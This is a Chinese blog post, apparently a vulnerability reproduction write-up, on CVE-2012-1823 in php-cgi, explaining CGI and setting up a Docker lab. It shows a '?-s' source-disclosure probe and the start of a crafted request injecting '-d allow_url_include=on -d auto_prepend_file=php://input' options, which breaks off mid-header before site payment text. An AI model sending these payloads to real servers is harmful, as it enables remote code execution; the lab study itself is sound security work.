CVE-2012-1823漏洞复现

本文详细介绍了CVE-2012-1823漏洞,该漏洞允许攻击者的querystring参数成为php-cgi的输入,导致代码执行。通过复现过程,包括CGI概念的解释,以及在特定环境中输入特定命令来触发漏洞,展示了漏洞的可行性。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

前言

这个漏洞简单来说,就是用户请求的querystring(querystring字面上的意思就是查询字符串,一般是对http请求所带的数据进行解析,这里也是指http请求中所带的数据)被作为了php-cgi的参数,最终导致了一系列结果。

CGI即通用网关接口(Common Gateway Interface),它是一段程序, 通俗的讲CGI就象是一座桥,把网页和WEB服务器中的执行程序连接起来,它把HTML接收的指令传递给服务器的执行程序,再把服务器执行程序的结果返还给HTML页。

复现

在相应的漏洞环境中输入

docker-compose up -d

生成环境
访问:http://your-ip:8080
在这里插入图片描述
环境成功搭建了,接下了去复现。
访问http://your-ip:8080/index.php?-s
在这里插入图片描述
可以看到爆出了代码,证明漏洞存在的
抓包构造数据包

GET /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1
H
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值